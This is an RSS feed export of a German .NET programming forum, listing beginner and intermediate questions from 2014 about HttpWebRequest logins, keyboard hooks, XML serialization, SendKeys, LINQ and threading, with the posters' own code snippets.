Ich möchte mich via postrequest auf einer Seite einloggen aber jedesmal wenn ich eine getrequest auf die seite ausführe um mir die hidden variablen zu besorgen bekomme ich zurück &quot;Bitte aktivieren Sie JavaScripts&quot;<br />
<br />
Problem 2:<br />
Ich lese den aktivierungslink aus der Email aus öffne diesen via get aber bekomme nur einen link zu einen jscript zurück der einen weiterleitet<br />
<br />
Meine Frage ist:<br />
Wie kann ich in einer get request, javascripts &quot;emulieren&quot; oder &quot;ausführen&quot;<br />
<br />
Mit freundlichen Grüßen<br />
Sploxfreak</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/httpwebrequest-mit-jscripts-35627</guid>
		</item>
		<item>
			<title>VB Ip Adessen aus SQL Datenbank Überprüfen</title>
			<link>net-94/vb-ip-adessen-aus-sql-datenbank-ueberpruefen-35393?goto=newpost</link>
			<pubDate>Sat, 22 Nov 2014 12:43:13 GMT</pubDate>
			<description><![CDATA[Hallo ich programmier derzeit ein Programm in dem IP Adressen in einer Datenbank liegen. 
Sobald man Das Program öffnet erscheint welche ip's pingen...]]></description>
			<content:encoded><![CDATA[<div>Hallo ich programmier derzeit ein Programm in dem IP Adressen in einer Datenbank liegen.<br />
Sobald man Das Program öffnet erscheint welche ip's pingen und welche nicht.<br />
<br />
Soweit so gut nur weis ich nicht mit welcher Methode ich den status darstellen kann.<br />
Mit textbox die die hintergrundfarbe änndert oder textlabel.<br />
<br />
Bitte um vorschläge.<br />
<br />
Danke</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>cslippe</dc:creator>
			<guid isPermaLink="true">net-94/vb-ip-adessen-aus-sql-datenbank-ueberpruefen-35393</guid>
		</item>
		<item>
			<title>VB.Net Event wird nicht geraised</title>
			<link>net-94/event-wird-nicht-geraised-35346?goto=newpost</link>
			<pubDate>Mon, 17 Nov 2014 16:16:10 GMT</pubDate>
			<description>Hallo. 
 
Und zwar geht es um Folgendes: 
 
 
Code: 
--------- 
Module Module1 
    Private Sub Test_Changedd(Sender As BaseClass) Handles...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Und zwar geht es um Folgendes:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Module Module1<br />
&nbsp; &nbsp; Private Sub Test_Changedd(Sender As BaseClass) Handles Test.Changedd<br />
&nbsp; &nbsp; &nbsp; &nbsp; Throw New Exception(&quot;yeah, hat geklappt&quot;)<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private WithEvents Test As A<br />
&nbsp; &nbsp; Class A : Inherits BaseClass<br />
&nbsp; &nbsp; &nbsp; &nbsp; Public Event Changedd As EventHandlerEx(Of BaseClass)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Public Delegate Sub EventHandlerEx(Of T0)(Sender As T0)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Protected Sub OnTest(se As BaseClass)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; RaiseEvent Changedd(se)<br />
&nbsp; &nbsp; &nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Private bbool As Boolean = False<br />
&nbsp; &nbsp; &nbsp; &nbsp; Public Property Lol As Boolean<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Get<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Return bbool<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; End Get<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Set(value As Boolean)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; If value = bbool Then Exit Property<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; bbool = value<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; End Set<br />
&nbsp; &nbsp; &nbsp; &nbsp; End Property<br />
&nbsp; &nbsp; End Class<br />
&nbsp; &nbsp; Public Class BaseClass<br />
<br />
&nbsp; &nbsp; End Class<br />
&nbsp; &nbsp; Private Sub Doit()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Test = New A()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Test.Lol = True<br />
&nbsp; &nbsp; End Sub<br />
&nbsp; &nbsp; Sub Main()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Doit()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ReadKey()<br />
&nbsp; &nbsp; End Sub<br />
End Module</code><hr />
</div><br />
Das Event Changedd wird einfach nicht ausgelöst / kann nicht empfangen werden.<br />
Weiß jemand, woran das liegt?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/event-wird-nicht-geraised-35346</guid>
		</item>
		<item>
			<title>VB.Net Gesetzer WinHook - Timeout</title>
			<link>net-94/gesetzer-winhook-timeout-34801?goto=newpost</link>
			<pubDate>Wed, 08 Oct 2014 18:21:22 GMT</pubDate>
			<description>Hallo. 
 
Ich habe mir eine Anwendung geschrieben, 
in der ich per SetWindowsHookEx die Taste F7 registriert habe. 
 
Wenn diese Taste gedrückt wird...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Ich habe mir eine Anwendung geschrieben,<br />
in der ich per SetWindowsHookEx die Taste F7 registriert habe.<br />
<br />
Wenn diese Taste gedrückt wird und mein Programm läuft, wird es in den Vordergrund geholt.<br />
<br />
Das klappt auch soweit alles super, doch da ist ein Problem.<br />
<br />
Die registrierte Taste wird nach bestimmter Zeit einfach nicht mehr erkannt.<br />
In der Entwicklungsumgebung steht &quot;Thread beendet&quot; , obwohl ich gar keine Threads manuell nutze.<br />
Den Hook habe ich nicht unregistriert.<br />
<br />
Kann mir jemand was dazu sagen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/gesetzer-winhook-timeout-34801</guid>
		</item>
		<item>
			<title>VB.Net SQL 3 Wrapper .Net</title>
			<link>net-94/sql-3-wrapper-net-34784?goto=newpost</link>
			<pubDate>Tue, 07 Oct 2014 11:40:27 GMT</pubDate>
			<description>Hallo. 
 
Weiß jemand, wie der Sql 3 Wrapper in .Net heißt und wie man den benutzen kann? 
 
Habe bisher immer nur externe Libs gesehen, aber es soll...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Weiß jemand, wie der Sql 3 Wrapper in .Net heißt und wie man den benutzen kann?<br />
<br />
Habe bisher immer nur externe Libs gesehen, aber es soll wohl auch einen .Net Wrapper<br />
im .Net Framework dafür geben...</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/sql-3-wrapper-net-34784</guid>
		</item>
		<item>
			<title>VB.Net Windows.Security.Credentials importieren - wie?</title>
			<link>net-94/windows-security-credentials-importieren-wie-34680?goto=newpost</link>
			<pubDate>Sat, 27 Sep 2014 18:16:10 GMT</pubDate>
			<description>Hallo. 
 
Weiß jemand, wie ich den Windows.Security.Credentials Namespace in Visual Studio 2013 reinbekomme? 
 
Danke im Voraus!</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Weiß jemand, wie ich den Windows.Security.Credentials Namespace in Visual Studio 2013 reinbekomme?<br />
<br />
Danke im Voraus!</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/windows-security-credentials-importieren-wie-34680</guid>
		</item>
		<item>
			<title>VB.Net Tastaturhooks - Taste wird doppelt gezählt</title>
			<link>net-94/tastaturhooks-taste-wird-doppelt-gezaehlt-34583?goto=newpost</link>
			<pubDate>Fri, 19 Sep 2014 16:27:59 GMT</pubDate>
			<description>Hallo. 
 
Ich nutze Tastaturhooks um die Anzahl der eingegebenen Zeichen zu zählen. 
 
Das Problem ist: Wenn ich eine Taste drücke, wird sie zweifach...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Ich nutze Tastaturhooks um die Anzahl der eingegebenen Zeichen zu zählen.<br />
<br />
Das Problem ist: Wenn ich eine Taste drücke, wird sie zweifach gezählt.<br />
<br />
Kann mir jemand sagen, woran das liegt?<br />
<br />
Rufe  <div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Return CallNextHookEx(mHandle, nCode, wParam, lParam)</code><hr />
</div>auf. Dennoch klappt es nicht.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/tastaturhooks-taste-wird-doppelt-gezaehlt-34583</guid>
		</item>
		<item>
			<title>C# Daten Serialisieren und Deserialisieren</title>
			<link>net-94/daten-serialisieren-deserialisieren-34357?goto=newpost</link>
			<pubDate>Fri, 29 Aug 2014 16:11:34 GMT</pubDate>
			<description><![CDATA[Hallo, 
 
Also Ich arbeite an ein kleinen Tool für persöhnliche Daten(Name,Nachname,Strasse & so weiter) & Ich würde das ganze gerne Abspeichern und...]]></description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
Also Ich arbeite an ein kleinen Tool für persöhnliche Daten(Name,Nachname,Strasse &amp; so weiter) &amp; Ich würde das ganze gerne Abspeichern und wieder Laden können.<br />
<br />
Ich habe mehrere Richtextboxen &amp; 2 Buttons(Speichern &amp; Laden) Ich hab mir ein Tutorial angeguckt dazu &amp; bin soweit gekommen das ich den Inhalt der Richtextboxen in eine XML Datei speichern kann<br />
<br />
Code:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp; &nbsp; &nbsp; private void button7_Click(object sender, EventArgs e)<br />
&nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; XmlTextWriter xwriter = new XmlTextWriter(&quot;savefile.xml&quot;, Encoding.Unicode);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteStartDocument();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteStartElement(&quot;XMLFILE&quot;);<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteStartElement(&quot;Title&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteString(richTextBox8.Text);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteString(richTextBox2.Text);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteEndElement();<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; foreach (String item in listBox1.Items)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteStartElement(&quot;Item&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteString(item);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteEndElement();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteEndElement();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.WriteEndDocument();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xwriter.Close();<br />
&nbsp; &nbsp; &nbsp; &nbsp; }</code><hr />
</div>Drücke ich auf Speichern (Inhalt: RichTextBox8 = Hallo, RichTextBox2 = Tschüss) wird das ganze so abgespeichert<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;<br />
<br />
-&lt;XMLFILE&gt;<br />
<br />
&lt;Title&gt;Hallo Tschüss&lt;/Title&gt;<br />
<br />
&lt;/XMLFILE&gt;</code><hr />
</div>Ich würde gerne das ganze etwas Strukturierter abgespeichert wird z.B so<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;<br />
<br />
-&lt;XMLFILE&gt;<br />
<br />
&lt;Title&gt;&lt;/Title&gt;<br />
&lt;richTextBox8&gt;Hallo&lt;/richTextBox8&gt;<br />
&lt;richTextBox2&gt;Tschüss&lt;/richTextBox&gt;<br />
&lt;/XMLFILE&gt;</code><hr />
</div>wie setze ich das um :?<br />
<br />
Und dann würde Ich noch gerne wissen, Wie Lade ich die gespeicherte XML datei in mein Programm? so das z,B der gespeicherte Inhalt Hallo &amp; Tschüss in der rTextBox8 &amp; 2 angezeigt wird.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>SphinxDOPE</dc:creator>
			<guid isPermaLink="true">net-94/daten-serialisieren-deserialisieren-34357</guid>
		</item>
		<item>
			<title>C# Ausgegrauten Button erst nach 30sek. Aktivieren?</title>
			<link>net-94/ausgegrauten-button-erst-nach-30sek-aktivieren-34308?goto=newpost</link>
			<pubDate>Tue, 26 Aug 2014 16:49:05 GMT</pubDate>
			<description><![CDATA[Guten Abend, 
 
Ich habe ein Problem undzwar habe ich 2 Buttons (button1 & button2) auf meiner Form. 
Button2 = ist auf Enabled = False gesetzt also...]]></description>
			<content:encoded><![CDATA[<div>Guten Abend,<br />
<br />
Ich habe ein Problem undzwar habe ich 2 Buttons (button1 &amp; button2) auf meiner Form.<br />
Button2 = ist auf Enabled = False gesetzt also Ausgegraut!<br />
<br />
Die Funktion vom Button1 aktiviert bzw. setzt Button2 Enabled = False auf True<br />
<br />
Code: <br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp;  private void button3_Click(object sender, EventArgs e)<br />
&nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; button4.Enabled = true;<br />
&nbsp; &nbsp; &nbsp; &nbsp;  }</code><hr />
</div>Also sobald ich Button1 anklicke wird Button2 wieder Aktiviert.<br />
Meine Frage ist: Wie kann ich ein Interval drauf setzen sprich das sich Button2 nicht sofort Aktiviert sobald ich Button1 geklickt habe sondern z.B nach 30Sek ?<br />
<br />
<br />
&amp; eine kleine Frage wie kann ich meine IP auslesen/anzeigen lassen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>SphinxDOPE</dc:creator>
			<guid isPermaLink="true">net-94/ausgegrauten-button-erst-nach-30sek-aktivieren-34308</guid>
		</item>
		<item>
			<title>VB.Net HttpWebRequest GET - Keine Response</title>
			<link>net-94/httpwebrequest-get-keine-response-34194?goto=newpost</link>
			<pubDate>Sun, 17 Aug 2014 16:13:36 GMT</pubDate>
			<description>Hallo. 
 
Ich habe hier eine Website, auf der ich beim GET Request leider keine Response erhalte. 
 
Eingeloggt bin ich mit dem Account, habe einen...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Ich habe hier eine Website, auf der ich beim GET Request leider keine Response erhalte.<br />
<br />
Eingeloggt bin ich mit dem Account, habe einen GET Request auf die Startseite gemacht, Cookies sind also da.<br />
<br />
Sonst hatte ich nie Probleme bei den GET Requests, die funktionieren normalerweise.<br />
<br />
Mein Vb.net Requestaufbau ist so:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Private Containa As CookieContainer = New CookieContainer<br />
<br />
Public Function Req(Site As String, Met As String, Optional P As String = &quot;&quot;) As String<br />
Dim Response As String = String.Empty<br />
<br />
Dim R As HttpWebRequest = CType(HttpWebRequest.Create(Site), HttpWebRequest)<br />
With R<br />
.Proxy = Nothing<br />
.Method = Met<br />
.CookieContainer = Containa<br />
.AllowAutoRedirect = True<br />
.UserAgent = &quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36&quot;<br />
.ContentType = &quot;application/x-www-form-urlencoded&quot;<br />
.Timeout = 12000<br />
End With<br />
<br />
If Met = &quot;POST&quot; AndAlso P.Length &gt; 4 Then<br />
R.ContentLength = P.Length<br />
Dim Wr As New StreamWriter(R.GetRequestStream(), System.Text.Encoding.Default)<br />
Wr.Write(P)<br />
Wr.Close()<br />
End If<br />
<br />
Dim Re As New StreamReader(R.GetResponse.GetResponseStream())<br />
Response = Re.ReadToEnd<br />
Re.Close()<br />
<br />
Return Response<br />
End Function</code><hr />
</div>Mein Aufruf:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Dim Url As String = String.Concat(&quot;http://www.diejeweiligeseite.org/newthread.php?do=postthread&amp;f=&quot;, CateGoryId)<br />
<br />
Dim T As String = Req(Url, &quot;GET&quot;)</code><hr />
</div>Kann mir jemand sagen, woran das liegt?<br />
<br />
<a href="https://u-labs.de/forum/attachment.php?attachmentid=7993&amp;d=1408292182" id="attachment7993" rel="Lightbox_0" ><img src="https://u-labs.de/forum/attachment.php?attachmentid=7993&amp;d=1408292182&amp;thumb=1" border="0" alt="Klicke auf die Grafik für eine größere Ansicht&nbsp;

Name:	Unbenannt.PNG&nbsp;
Hits:	225&nbsp;
Größe:	53,2 KB&nbsp;
ID:	7993" class="thumbnail" style="float:CONFIG" /></a></div>


	<div style="padding:10px">

	
		<fieldset class="fieldset">
			<legend>Miniaturansichten angehängter Grafiken</legend>
			<div style="padding:10px">
			
<a href="https://u-labs.de/forum/attachment.php?attachmentid=7993&amp;d=1408292182" 
rel="Lightbox_387019" id="attachment7993"
><img class="thumbnail" src="https://u-labs.de/forum/attachment.php?attachmentid=7993&amp;stc=1&amp;thumb=1&amp;d=1408292182" 
alt="Klicke auf die Grafik für eine größere Ansicht&nbsp;

Name:	Unbenannt.PNG&nbsp;
Hits:	-&nbsp;
Größe:	53,2 KB&nbsp;
ID:	7993"/></a>
&nbsp;

			</div>
		</fieldset>
	

	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/httpwebrequest-get-keine-response-34194</guid>
		</item>
		<item>
			<title>Bei VB.NET bleiben, oder zu C# wechseln?</title>
			<link>net-94/bei-vb-net-bleiben-zu-c-wechseln-33418?goto=newpost</link>
			<pubDate>Sun, 22 Jun 2014 11:30:02 GMT</pubDate>
			<description>Guten Tag :) 
 
Da ich demnächst auf eine neue Schule wechseln werde, die auf Informatik spezialisiert ist, frage ich mich schonmal jetzt was ich...</description>
			<content:encoded><![CDATA[<div>Guten Tag :)<br />
<br />
Da ich demnächst auf eine neue Schule wechseln werde, die auf Informatik spezialisiert ist, frage ich mich schonmal jetzt was ich denn dafür tun könnte, einen guten Start zu haben.<br />
<br />
Habe vor 2 Jahren mit der Programmierung angefangen und bis jetzt hauptsächlich VB.NET verwendet und hatte nie Probleme, würde auch sagen dass ich in VB.NET am meisten Erfahrung habe. In C# kann ich Grundlagen, jedoch kann ich mich nicht wirklich mit der Syntax anfreunden. In dieser Schule wirrd jedoch kein VB.NET gelehrt, deshalb dachte ich mir dass es klug wäre jetzt auf C# umzusteigen. Im Laufe der Jahre werde ich in der Schule Java (Einstieg), PHP und C# lernen. Nun stellt sich mir die Frage ob ich weiter in VB machen sollte, da es mir am meisten Spaß macht (und ich auch Erfahrung drin habe), oder auf C# umsteigen soll, die ich ja sowieso in der Schule lernen werde (jedoch dachte ich dass es gut sei, wenn ich schon Erfahrung habe). Wie seht ihr das? Grundlagen in .NET beherrsche ich, habe mich dann aber auf VB spezialisiert. Lohnt es sich überhaupt auf C# umzusteigen? Wird es mir evtl. bei Java helfen (da die Syntax ja ähnlich ist)? Des Weiteren meinen ja viele, dass VB.NET ausgedient hat und jetzt eig. überall (also im Beruf) in C# programmiert wird und man deshalb unbedingt Erfahrung darin braucht. Hat jemand Erfahrung damit? Stimmt das überhaupt?<br />
<br />
Bräuchte Rat von einer erfahrenen Person :D<br />
<br />
Gruß und Vielen Dank schonmal für eure Antworten :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>TheBeardWoman</dc:creator>
			<guid isPermaLink="true">net-94/bei-vb-net-bleiben-zu-c-wechseln-33418</guid>
		</item>
		<item>
			<title>VB.Net Tastendruck in bestimmtem Intervall simulieren</title>
			<link>net-94/tastendruck-in-bestimmtem-intervall-simulieren-33240?goto=newpost</link>
			<pubDate>Sat, 07 Jun 2014 11:59:23 GMT</pubDate>
			<description>Hey leute. :) 
 
Ich habe: 
- 1 Textbox 
- 1 Timer 
- 1 Checkbox 
 
Ich will das der eingegebene Text von Textbox1 per Tastendruck z.B (F1)...</description>
			<content:encoded><![CDATA[<div>Hey leute. :)<br />
<br />
Ich habe:<br />
- 1 Textbox<br />
- 1 Timer<br />
- 1 Checkbox<br />
<br />
Ich will das der eingegebene Text von Textbox1 per Tastendruck z.B (F1) erscheint, Aktiviert soll das ganze werden, durch die Checkbox.<br />
Ich habe das ganze damals in VB6 schon mal gemacht, als ich den Code aber in VB.net übernehmen wollte ist mir aufgefallen das es nicht ganz so klappt wie ich es möchte. xD<br />
<br />
Nun zum eigentlichen Problem: <br />
Wenn ich den Text in der Textbox schreibe, fängt der schon an zu Flooden. So möchte ich es natürlich nicht.<br />
Hoffentlich kann mir jemanden mal mein fehler genau erklären und eine Lösung vorschlagen.<br />
<br />
Hier der Code:<br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Public Class Form1<br />
&nbsp; &nbsp; Dim F2 As Boolean = False<br />
&nbsp; &nbsp; Private Declare Function GetAsyncKeyState Lib &quot;user32&quot; (ByVal vkey As Long) As Integer<br />
<br />
&nbsp; &nbsp; Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick<br />
&nbsp; &nbsp; &nbsp; &nbsp; F2 = GetAsyncKeyState(Keys.F2)<br />
&nbsp; &nbsp; &nbsp; &nbsp; If (F2 = True) Then<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; System.Windows.Forms.SendKeys.Send(TextBox1.Text)<br />
&nbsp; &nbsp; &nbsp; &nbsp; End If<br />
&nbsp; &nbsp; End Sub<br />
&nbsp; &nbsp; Private Sub Checkbox1_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs)<br />
<br />
&nbsp; &nbsp; End Sub<br />
End Class</code><hr />
</div>
</div>
</div>
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Zauberer</dc:creator>
			<guid isPermaLink="true">net-94/tastendruck-in-bestimmtem-intervall-simulieren-33240</guid>
		</item>
		<item>
			<title>C# Linq Unterschied zwischen First und FirstOrDefault?</title>
			<link>net-94/linq-unterschied-zwischen-first-firstordefault-33079?goto=newpost</link>
			<pubDate>Fri, 23 May 2014 16:00:39 GMT</pubDate>
			<description>Hallo, ich habe heute angefangen mir Linq in C# anzuschauen. Verstehe aber nicht so richtig wo der Unterschied zwischen First und FirstOrDefault ist....</description>
			<content:encoded><![CDATA[<div>Hallo, ich habe heute angefangen mir Linq in C# anzuschauen. Verstehe aber nicht so richtig wo der Unterschied zwischen First und FirstOrDefault ist. :'(</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>KingofRapx3</dc:creator>
			<guid isPermaLink="true">net-94/linq-unterschied-zwischen-first-firstordefault-33079</guid>
		</item>
		<item>
			<title>VB.Net Await / Async ungleich Thread STA</title>
			<link>net-94/await-async-ungleich-thread-sta-32956?goto=newpost</link>
			<pubDate>Tue, 13 May 2014 10:26:00 GMT</pubDate>
			<description>Hallo. 
 
Ich habe hier Code , der mit folgendem Code einwandfrei funktioniert: 
 
 
 
Code: 
--------- 
Private Sub Test() 
Dim T As New Thread(Sub()</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Ich habe hier Code , der mit folgendem Code einwandfrei funktioniert:<br />
<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Private Sub Test()<br />
Dim T As New Thread(Sub()<br />
'Code..<br />
End Sub)<br />
&nbsp;T.IsBackground = True<br />
&nbsp; &nbsp; &nbsp; &nbsp; T.SetApartmentState(ApartmentState.STA)<br />
&nbsp; &nbsp; &nbsp; &nbsp; T.Start()<br />
End Sub</code><hr />
</div><br />
Lasse ich das T.SetApartmentState(ApartmentState.STA) weg, so funktioniert der Code nicht.<br />
<br />
<br />
<br />
<br />
Derselbe Code funktioniert nicht mit:<br />
<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Private Async Sub Test()<br />
Await Task.Run(Sub()<br />
'Code<br />
End Sub<br />
End Sub</code><hr />
</div><br />
<br />
Würde mir schon gerne den Thread aus dem Threadpool nehmen, allerdings <br />
bewirkt dieses STA schon etwas...<br />
<br />
Kann mir jemand sagen, woran das liegt?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/await-async-ungleich-thread-sta-32956</guid>
		</item>
		<item>
			<title>VB.Net Hilfe Convert Tool</title>
			<link>net-94/hilfe-convert-tool-31868?goto=newpost</link>
			<pubDate>Tue, 08 Apr 2014 13:12:33 GMT</pubDate>
			<description>ich will die csv datei editieren und danach wieder zu einer .log datei verschlüsseln.</description>
			<content:encoded><![CDATA[<div>ich will die csv datei editieren und danach wieder zu einer .log datei verschlüsseln.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>taylorgates</dc:creator>
			<guid isPermaLink="true">net-94/hilfe-convert-tool-31868</guid>
		</item>
		<item>
			<title>C# Primzahlberechnung mit Unter- und Obergrenze.</title>
			<link>net-94/primzahlberechnung-mit-unter-obergrenze-31094?goto=newpost</link>
			<pubDate>Sun, 16 Mar 2014 20:35:45 GMT</pubDate>
			<description><![CDATA[Heey ich bräuchte mal schnell Hilfe von nem' Experten haha.. 
 
Es geht, wie mein Topic schon verrät, um die Primzahlenberechnung mit einer Unter und...]]></description>
			<content:encoded><![CDATA[<div>Heey ich bräuchte mal schnell Hilfe von nem' Experten haha..<br />
<br />
Es geht, wie mein Topic schon verrät, um die Primzahlenberechnung mit einer Unter und Obergrenze.<br />
Der Benutzer gibt eine Untergrenze und eine Obergrenze ein und es sollen alle Primzahlen zwischen den Grenzen angezeigt werden ..<br />
Vom Code her ist es nicht schwer, nur ich habe keine Ahnung wie die Berechnung funktionieren soll :-/<br />
<br />
Habe auch schon gegooglet, aber nichts sinnvolles gefunden :-(<br />
<br />
Lg, Saad.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Saad</dc:creator>
			<guid isPermaLink="true">net-94/primzahlberechnung-mit-unter-obergrenze-31094</guid>
		</item>
		<item>
			<title>VB.Net HTTPwebrequest: Wer Kennt Wen?</title>
			<link>net-94/httpwebrequest-wer-kennt-wen-30863?goto=newpost</link>
			<pubDate>Sun, 09 Mar 2014 21:45:43 GMT</pubDate>
			<description>Hallöchen :)  
 
Ich arbeite mit folgendem Code: 
 
Code: 
--------- 
With New Http 
            
            Dim html As String = String.Empty</description>
			<content:encoded><![CDATA[<div>Hallöchen :) <br />
<br />
Ich arbeite mit folgendem Code:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">With New Http<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim html As String = String.Empty<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim username As String = &quot;xxx&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim password As String = &quot;abc&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; html = .GetResponse(&quot;https://secure.wer-kennt-wen.de/login/index&quot;, &quot;loginName=&quot; &amp; username &amp; &quot;&amp;pass=&quot; &amp; password &amp; &quot;&amp;logIn=1&quot;)<br />
&nbsp; &nbsp; &nbsp;  <br />
